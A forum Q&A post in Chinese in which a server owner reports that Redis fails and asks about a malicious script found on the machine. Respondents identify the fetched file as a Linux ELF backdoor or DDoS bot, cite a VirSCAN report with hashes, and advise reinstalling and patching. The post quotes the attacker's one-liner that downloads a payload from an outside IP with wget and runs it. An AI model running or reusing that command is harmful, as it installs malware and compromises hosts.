问题描述
今天发现一台服务器redis无法连接,在服务器发现这样一条指令
#!/bin/bashzfile='/tmp/z.TF'if [ ! -f '$zfile' ]; then wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TFfi
下载并执行了z.TF文件,z.TF打开都是字节码,此程序可以自动重新执行。
目前将此程序进程杀死,但是redis服务仍然无法使用,不知道是否还留有其他恶意程序。
请高手解答z.TF的内容?并且如何处理。
问题解答
回答1:z.TF 是个ELF格式的linux可执行文件
你服务器被装了后门,尽快重装系统,修复漏洞。该升级的都升级一遍。
基本可以确定是 后门+肉鸡
VirSCAN.org Scanned Report :Scanned time : 2017-06-06 20:53:39Scanner results: 10%的杀软(4/39)报告发现病毒File Name : z.TFFile Size : 649640 byteFile Type : application/x-executableMD5 : a6f42e73365ad56ce42985c5518d7e34SHA1 : 564d6e2c2489a6d3a9d0634f76e065be7ad28072Online report : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4ScannerEngine Ver Sig Ver Sig Date Time Scan resultAVAST! 170303-1 4.7.4 2017-03-03 46 ELF:Ddostf-A SOPHOS 5.32 3.65.2 2016-10-10 8 Linux/DDoS-BE 奇虎360 1.0.1 1.0.1 1.0.1 4 Win32/Backdoor.34d 江民杀毒 16.0.100 1.0.0.0 2017-06-05 2 Backdoor.Linux.wfg 回答2:
话说你把t.ZF的代码发上来啊
你贴出来的代码,你不是自己已经解释清楚了么
